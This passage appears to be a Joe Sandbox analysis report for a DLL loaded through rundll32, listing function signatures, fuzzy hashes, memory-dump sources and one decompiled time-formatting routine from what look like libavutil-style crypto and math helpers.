                                                      0x10013650
                                                      0x1001365c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x100135f4
                                                      0x100135bf
                                                      0x10013774
                                                      0x1001377a
                                                      0x1001377c
                                                      0x1001377c
                                                      0x1001377a
                                                      0x00000000
                                                      0x100134b6

                                                      APIs
                                                      • mv_encryption_init_info_alloc.MAIN ref: 10013562
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_encryption_init_info_alloc
                                                      • String ID:
                                                      • API String ID: 3189372936-0
                                                      • Opcode ID: 40eb082df2a873b27e792bc7caffd1106743bd01b0e16bd1d615b7bb6c7bfb03
                                                      • Instruction ID: a1e043498c3c16070c5ce0a7d842a7d55674a9d60fbffb8ceeaa7ba958246eb1
                                                      • Opcode Fuzzy Hash: 40eb082df2a873b27e792bc7caffd1106743bd01b0e16bd1d615b7bb6c7bfb03
                                                      • Instruction Fuzzy Hash: ACB169B1A083418FC764CF29C58461BFBE2FFC8254F56896DE9899B350E731E981CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strlen
                                                      • String ID: %d.%06d$%d:%02d.%06d$%lld:%02d:%02d.%06d$INT64_MAX$INT64_MIN
                                                      • API String ID: 39653677-2240581584
                                                      • Opcode ID: 5ea261cdb59da726b0206cc8ad8b11822e12deeae5e592c96d0b6b2e14b3df2d
                                                      • Instruction ID: c54e951a0f1896a6386a6c5c1f669f1c3c64ce07789a61242c38440661c84367
                                                      • Opcode Fuzzy Hash: 5ea261cdb59da726b0206cc8ad8b11822e12deeae5e592c96d0b6b2e14b3df2d
                                                      • Instruction Fuzzy Hash: A8A16D76A193118FC308CF6DC44421EFBE6EBC8350F998A2EF488D7364DA74D9058B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 355135263088e94a10b3081d7ca45438585c75b071c068879c5feec0f380323f
                                                      • Instruction ID: 51e70f272ae0093965207845ec1cb951f05259167ff59344558e7544d7b47f58
                                                      • Opcode Fuzzy Hash: 355135263088e94a10b3081d7ca45438585c75b071c068879c5feec0f380323f
                                                      • Instruction Fuzzy Hash: 69C19E71A087858BD350CF2D888064EBBE1FFC9294F198A2EF9D8C7355E675D9448B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem_errno
                                                      • String ID:
                                                      • API String ID: 3586254970-0
                                                      • Opcode ID: eb795a304289e64b422f20939e939fd83203c3a050f27a67b90a55001f882086
                                                      • Instruction ID: a6a4ef0f4dcf97e1d99c5454615c768c8d757491a9aa12e503df49880ea70f1b
                                                      • Opcode Fuzzy Hash: eb795a304289e64b422f20939e939fd83203c3a050f27a67b90a55001f882086
                                                      • Instruction Fuzzy Hash: BC4189716087548FC754DF79C98461ABBE5FBC8750F118A2EEAA887350E770ED448B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32 ref: 1008F681
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 565725191-0
                                                      • Opcode ID: 911fbccf3e6d103ec169fe48f33fd043b6d4840403c0ea04d5ce06a0aebe5803
                                                      • Instruction ID: 644768b22c3724b228d8b808f31f7f684975bc292c311e4257fcfe74704407b1
                                                      • Opcode Fuzzy Hash: 911fbccf3e6d103ec169fe48f33fd043b6d4840403c0ea04d5ce06a0aebe5803
                                                      • Instruction Fuzzy Hash: D32125B08093119FDB10EF34D5C936ABBE0FF88354F018A2DE88587254E778D884CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E1004B2A5(intOrPtr* _a4, intOrPtr _a8) {
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				unsigned int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				signed int _t142;
                                                      				signed int _t208;
                                                      				signed int _t216;
                                                      				signed int _t221;
                                                      				signed int _t222;
                                                      				signed int _t234;
                                                      				signed int _t243;
                                                      				signed int _t247;
                                                      				signed int _t298;
                                                      				signed int _t307;
                                                      				signed int _t308;
                                                      				intOrPtr* _t313;
                                                      				signed int _t325;
                                                      				signed int _t326;
                                                      				void* _t328;
                                                      				signed int* _t329;
                                                      
                                                      				_t329 = _t328 - 0x2c;
                                                      				_t313 = _a4;
                                                      				_t216 =  *(_t313 + 0x10);
                                                      				_t234 =  *_t313 + _a8;
                                                      				_t122 =  *(_t313 + 4) & 0x00000001;
                                                      				_v44 = _t122;
                                                      				if(_t122 != 0 && _t216 != 0) {
                                                      					asm("ror eax, 1");
                                                      					if(0x8888888 + _t216 * 0xeeeeeeef <= 0x8888888) {
                                                      						_t307 = ((0x88888889 * _t216 >> 0x20) + _t216 >> 4) - (_t216 >> 0x1f);
                                                      						_t208 = _t234;
                                                      						_t326 = _t307 + _t307;
                                                      						asm("cdq");
                                                      						_t308 = _t307 * 0x463e;
                                                      						 *_t329 = _t208 / _t308;
                                                      						_v56 = _t208 % _t308 - _t326;
                                                      						asm("cdq");
                                                      						_t234 = _v56 / ((0x66666667 * _t308 >> 0x20 >> 2) - (_t308 >> 0x1f)) * _t326 + _t326 *  *_t329 + _t326 *  *_t329 * 8 + _t234;
                                                      					}
                                                      				}
                                                      				_t123 = _t234;
                                                      				_t124 = _t123 / _t216;
                                                      				_t247 = _t123 % _t216;
                                                      				_v40 = _t247;
                                                      				_v52 = _t247;
                                                      				 *_t329 = _t123 / _t216 - ((_t124 * 0x88888889 >> 0x20 >> 5 << 4) - (_t124 * 0x88888889 >> 0x20 >> 5) << 2);
                                                      				_t131 = _t234 / ((_t216 << 4) - _t216 << 2);
                                                      				_t138 = _t234 / _t216 * 0xe10;
                                                      				_t325 = _t234 / ((_t216 << 4) - _t216 << 2) - ((_t131 * 0x88888889 >> 0x20 >> 5 << 4) - (_t131 * 0x88888889 >> 0x20 >> 5) << 2);
                                                      				_t221 =  *(_t313 + 0xc);
                                                      				_t142 =  *(_t313 + 8);
                                                      				_v56 = _t234 / _t216 * 0xe10 - ((_t138 * 0xaaaaaaab >> 0x20 >> 4) + (_t138 * 0xaaaaaaab >> 0x20 >> 4) * 2 << 3);
                                                      				_v28 = _t221;
                                                      				_v36 = _t221;
                                                      				_v24 = _t142;
                                                      				_v32 = _t221 >> 0x1f;
                                                      				_t298 = _t142 >> 0x1f;
                                                      				_t222 = _t298;
                                                      				asm("sbb ebx, edx");
                                                      				_v48 = 0;
                                                      				if((_t222 | _t142 - 0x0000001e * _t221) != 0) {
                                                      					if((_v32 ^ _t222) < 0) {
                                                      						goto L5;
                                                      					}
                                                      					if((_v40 + (_v40 >> 0x0000001f) & 0x00000001) - (_v40 >> 0x1f) == 1) {
                                                      						if((0x00000032 * _v28 ^ _v24 | _t298 ^ 0x00000032 * _v28 >> 0x00000020) != 0) {
                                                      							_v48 = 0x800000;
                                                      						} else {
                                                      							if(_v28 != 0) {
                                                      								_v48 = 0x80;
                                                      							} else {
                                                      								_t201 =  <=  ? 0x800000 : 0x80;
                                                      								_v48 =  <=  ? 0x800000 : 0x80;
                                                      							}
                                                      						}
                                                      					}
                                                      					_v52 = (_v40 >> 0x1f) + _v40 >> 1;
                                                      				}
                                                      				L5:
                                                      				_t243 = _v52 - ((0x66666667 * _v52 >> 0x20 >> 4) - (_t316 >> 0x1f) + ((0x66666667 * _v52 >> 0x20 >> 4) - (_t316 >> 0x1f)) * 4 << 3);
                                                      				_v52 = _v44 << 0x1e;
                                                      				_t300 = _v56 * 0xcccccccd >> 0x20 >> 3;
                                                      				_t262 =  *_t329 * 0xcccccccd >> 0x20 >> 3;
                                                      				_t319 = _t325 * 0xcccccccd >> 0x20 >> 3;
                                                      				return _t243 - (0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f) + ((0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f)) * 0x00000004 + (0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f) + ((0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f)) * 0x00000004 << 0x00000018 | _v56 * 0xcccccccd >> 0x00000020 >> 0x00000003 << 0x00000004 |  *_t329 - ( *_t329 * 0xcccccccd >> 0x00000020 >> 0x00000003) + ( *_t329 * 0xcccccccd >> 0x00000020 >> 0x00000003) * 0x00000004 + ( *_t329 * 0xcccccccd >> 0x00000020 >> 0x00000003) + ( *_t329 * 0xcccccccd >> 0x00000020 >> 0x00000003) * 0x00000004 << 0x00000010 | _t262 << 0x00000014 | _v56 - (_v56 * 0xcccccccd >> 0x00000020 >> 0x00000003) + _t300 * 0x00000004 + (_v56 * 0xcccccccd >> 0x00000020 >> 0x00000003) + _t300 * 0x00000004 | _v52 | _t325 * 0xcccccccd >> 0x00000020 >> 0x00000003 << 0x0000000c | _t325 - (_t325 * 0xcccccccd >> 0x00000020 >> 0x00000003) + _t319 * 0x00000004 + (_t325 * 0xcccccccd >> 0x00000020 >> 0x00000003) + _t319 * 0x00000004 << 0x00000008 | _v48 | (0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f) << 0x0000001c;
                                                      				}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: gfff$gfff$gfff
                                                      • API String ID: 0-4275324669
                                                      • Opcode ID: 268b3e8c4049cf9f0418b796dedf1257a26545202377507e9ea087931b81b73a
                                                      • Instruction ID: d59a2d3ae2d3648ea39482ecc8a01c73a7ed0aed4c874a4a860ecf1c914a34e2
                                                      • Opcode Fuzzy Hash: 268b3e8c4049cf9f0418b796dedf1257a26545202377507e9ea087931b81b73a
                                                      • Instruction Fuzzy Hash: EE71A632B047164BD758CE2ECD8020ABBD7EBC8350F598A3DE599DB394DA70ED158B81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_malloc
                                                      • String ID:
                                                      • API String ID: 3797683224-0
                                                      • Opcode ID: d0f46ac01df2d66eedf7921aeb8116c9143c8572b1c9a41cb75b5c2ebe5f539e
                                                      • Instruction ID: d9cd303cd0cdd735b109894e0513b1deaf0e71c410b9c65df79ef7a199e1e6cc
                                                      • Opcode Fuzzy Hash: d0f46ac01df2d66eedf7921aeb8116c9143c8572b1c9a41cb75b5c2ebe5f539e
                                                      • Instruction Fuzzy Hash: B3718CB2A042568BCB14CF28C88175AB7E2FF84354F66C568ED899F341E671ED81CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_blowfish_crypt_ecb.MAIN ref: 10008642
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_blowfish_crypt_ecb
                                                      • String ID:
                                                      • API String ID: 997994871-0
                                                      • Opcode ID: e25778ea9fdb925930b24f7ee5b61e2c5b198a0ae9bacbd401b09897083a4e10
                                                      • Instruction ID: d8ffb9ab9be6425fb2f2151958634ca33b63df147d529954a2eeef9d18f7c60e
                                                      • Opcode Fuzzy Hash: e25778ea9fdb925930b24f7ee5b61e2c5b198a0ae9bacbd401b09897083a4e10
                                                      • Instruction Fuzzy Hash: 537145B19097818BC709CF29D5C846AFBE1FFC9245F118A5EE8DC87344E270AA04CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_mod_i
                                                      • String ID:
                                                      • API String ID: 416848386-0
                                                      • Opcode ID: 3d8ce93c5e70e6cdd39acc70d59f7b57e28878e6643059ac4b681878335ad598
                                                      • Instruction ID: 3b891c88cdfbd3cf44d5afe30d3efed3761ce116010d257e45fc06df1577aa2c
                                                      • Opcode Fuzzy Hash: 3d8ce93c5e70e6cdd39acc70d59f7b57e28878e6643059ac4b681878335ad598
                                                      • Instruction Fuzzy Hash: 59421576A083A18BD324CF19C05066EF7E2FFD8750F568A1EE9D997390D774A840CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_gcd
                                                      • String ID:
                                                      • API String ID: 2848192316-0
                                                      • Opcode ID: 94c61de4151f85b2e349843c83d37783726b6990a1d380f2b046a8bb30d58925
                                                      • Instruction ID: bae91829bd6a7d55044bc074d33ea4c9e53b069e54380698bce3da439848f8c3
                                                      • Opcode Fuzzy Hash: 94c61de4151f85b2e349843c83d37783726b6990a1d380f2b046a8bb30d58925
                                                      • Instruction Fuzzy Hash: A3F1CE75A083518FC358CF2AC48061AFBE6BFC8750F559A2EF998D7360D670E8458F82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 10028D90: strcmp.MSVCRT ref: 10028DC8
                                                        • Part of subcall function 10028D90: strcmp.MSVCRT ref: 10028DE8
                                                      • mv_d2q.MAIN ref: 1002B5CC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strcmp$mv_d2q
                                                      • String ID:
                                                      • API String ID: 1563177686-0
                                                      • Opcode ID: dbf8743510c8fbbd616d23bfe24ff011681c019d3911d58527e69379db29e0a2
                                                      • Instruction ID: 1f0a7b361e8469cdb879426936d90b34354dbc15308211f32f0c3676d5f7708e
                                                      • Opcode Fuzzy Hash: dbf8743510c8fbbd616d23bfe24ff011681c019d3911d58527e69379db29e0a2
                                                      • Instruction Fuzzy Hash: 19715C34608F46CFC356DF38D08060AF7B1FF86340F968B99E9566B256EB31E8859B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_encryption_init_info_alloc.MAIN ref: 10013562
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_encryption_init_info_alloc
                                                      • String ID:
                                                      • API String ID: 3189372936-0
                                                      • Opcode ID: cd6924afccd7b87e315566fc0b34ac7627ccdbad5b7df46105264a39c2b01be1
                                                      • Instruction ID: 78d0e82bed4cec982bfd679939fa63163902b3eee1ff480991edcad54221ee49
                                                      • Opcode Fuzzy Hash: cd6924afccd7b87e315566fc0b34ac7627ccdbad5b7df46105264a39c2b01be1
                                                      • Instruction Fuzzy Hash: 1951F5B1A087419FC744CF29C58451ABBE2FFC8654F56CA2DF889A7350D731ED458B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_encryption_init_info_alloc.MAIN ref: 10013562
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_encryption_init_info_alloc
                                                      • String ID:
                                                      • API String ID: 3189372936-0
                                                      • Opcode ID: ef5d398cf4f7091da99b035e9d0245d92d88978e73b2c3d1eb8e068e5064dbea
                                                      • Instruction ID: 95a8c643b77e51546d68e8d33e3f4ed292e5d24ad01eeb6ce01257d6c0bf5d32
                                                      • Opcode Fuzzy Hash: ef5d398cf4f7091da99b035e9d0245d92d88978e73b2c3d1eb8e068e5064dbea
                                                      • Instruction Fuzzy Hash: 2D5128B1A087419FC744CF29C58461AFBE2FFC8654F56C92DE889AB350D731ED428B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_aes_crypt
                                                      • String ID:
                                                      • API String ID: 1547198422-0
                                                      • Opcode ID: a76755bfb4d6463656838ecde433fd04cde547babbb3dbb5163c6ebd5a4d3b10
                                                      • Instruction ID: 6533aa27bc2eace4d46e94b1d96a72d5c0883edd5f4be066e5c3eb9db2eb8fbd
                                                      • Opcode Fuzzy Hash: a76755bfb4d6463656838ecde433fd04cde547babbb3dbb5163c6ebd5a4d3b10
                                                      • Instruction Fuzzy Hash: 81419D3510D7C18FD301CF69848054AFFE1FF99288F198A6DE8D993306D260EA09CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_aes_crypt
                                                      • String ID:
                                                      • API String ID: 1547198422-0
                                                      • Opcode ID: 3928a72eaf0bdf75db777ef61b97453f1547db555a5c878ed5744eb0c7f909a7
                                                      • Instruction ID: b15eea7d1e62e16a03610dfd725cbd08b0199710858140edd711ee624ae9ea9b
                                                      • Opcode Fuzzy Hash: 3928a72eaf0bdf75db777ef61b97453f1547db555a5c878ed5744eb0c7f909a7
                                                      • Instruction Fuzzy Hash: DC31C47610D7C18FD302CB6990C0099FFE1FF99248F198AADE4DD93706D264EA19CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_blowfish_crypt_ecb.MAIN ref: 100086C2
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_blowfish_crypt_ecb
                                                      • String ID:
                                                      • API String ID: 997994871-0
                                                      • Opcode ID: acf8950ea6c148c44c64157bc22eca501f0550abc9d144bf7c67352d16790dd9
                                                      • Instruction ID: 3ce9d50094e6346554c2820e15aae8c95f0dca09f8e32c6084807ed2f7b375be
                                                      • Opcode Fuzzy Hash: acf8950ea6c148c44c64157bc22eca501f0550abc9d144bf7c67352d16790dd9
                                                      • Instruction Fuzzy Hash: 26019DB59093448FC709CF18E48842AFBE0FB8C355F11892EF8CCA7740E774AA448B46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9%lld
                                                      • API String ID: 0-1067827528
                                                      • Opcode ID: bcdcc6efd6621e1f85b7218b7b67dfd4e03329ea09515bb0419dbee41511919b
                                                      • Instruction ID: 101352dd42f6db591cdfd1097ab698e3354d26ef9933b018def11634da6c13ef
                                                      • Opcode Fuzzy Hash: bcdcc6efd6621e1f85b7218b7b67dfd4e03329ea09515bb0419dbee41511919b
                                                      • Instruction Fuzzy Hash: AB613D76A187158FD308DF29D88025AF7E2FBC8310F49892DF999DB351E674EC059B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9%lld
                                                      • API String ID: 0-1067827528
                                                      • Opcode ID: 0fa6dd96bcb8b49d32427fa14dca801b7d20183067ebe2f5af9251743fd18f1c
                                                      • Instruction ID: 07c5791c45fa29d35386c44efcc7358132a53f75d1a9a2a1ef31ce81eb8ddbf6
                                                      • Opcode Fuzzy Hash: 0fa6dd96bcb8b49d32427fa14dca801b7d20183067ebe2f5af9251743fd18f1c
                                                      • Instruction Fuzzy Hash: F6513876A187158FD308DF19D88025AF7E2FBC8310F49892DFA999B351E774EC059B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *
                                                      • API String ID: 0-163128923
                                                      • Opcode ID: f7bbd7721ca75eba7fa29301916c8371da0f62bce0992595b79b08e752eb8dc5
                                                      • Instruction ID: c15c81efb2fd65274e57c9dcba0b9463b5106a8dfd25bbab1057f7fea26fdb11
                                                      • Opcode Fuzzy Hash: f7bbd7721ca75eba7fa29301916c8371da0f62bce0992595b79b08e752eb8dc5
                                                      • Instruction Fuzzy Hash: 94413CB6E083515FD340CE29C88125AF7E1EBC8754F5A892EF8D8DB351E674EC518B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6db034cff99af1e7203ee44394934ffb7567196ced3806a0dc990b907df53bb
                                                      • Instruction ID: aff783430aa08d586327c987e6b98b0e0f6b454682ab812075f4302f75d353d4
                                                      • Opcode Fuzzy Hash: d6db034cff99af1e7203ee44394934ffb7567196ced3806a0dc990b907df53bb
                                                      • Instruction Fuzzy Hash: D632503274471D4BC708EEE9DC811D5B3D2BB88614F49813C9E15D3706FBB8BA6A96C8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7fd6380a6ea4c78d65a7d71ee52a6b8ffee4365087ee231698d748b4880fdc6b
                                                      • Instruction ID: 4b4ebc0a7281eede42f3b5a7b8291780f737a07bfc980894c4e29b3e9b1ce63d
                                                      • Opcode Fuzzy Hash: 7fd6380a6ea4c78d65a7d71ee52a6b8ffee4365087ee231698d748b4880fdc6b
                                                      • Instruction Fuzzy Hash: B9227B32A093568FC715DF29C89055AB7F1FF89316F19891DE9D99B210D230FE05DB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33419a9aeb14ce56b4ab0fd1bc83750a17983b722cf78c8c468c2c97687aa838
                                                      • Instruction ID: 3194deff8c1016480bd4981d57c44dc359412b19884f203e35b39e086724ce96
                                                      • Opcode Fuzzy Hash: 33419a9aeb14ce56b4ab0fd1bc83750a17983b722cf78c8c468c2c97687aa838
                                                      • Instruction Fuzzy Hash: D342DE756087409FC754CF29C58099AFBE2BFCE250F16C92EE899C7356D630E942CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e12ceeeddabea2a45ca0b25d6d0e56ab0a323e72b2d12a6fe70e262d570a28b0
                                                      • Instruction ID: 571bd5867c6101fa5e645701067c2fbe670199725f1a45366c6b5ce0b233dcdc
                                                      • Opcode Fuzzy Hash: e12ceeeddabea2a45ca0b25d6d0e56ab0a323e72b2d12a6fe70e262d570a28b0
                                                      • Instruction Fuzzy Hash: A202D171A083458FC314CF28D48025ABBE2FFC6344F698A6ED9988F756D375D946CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
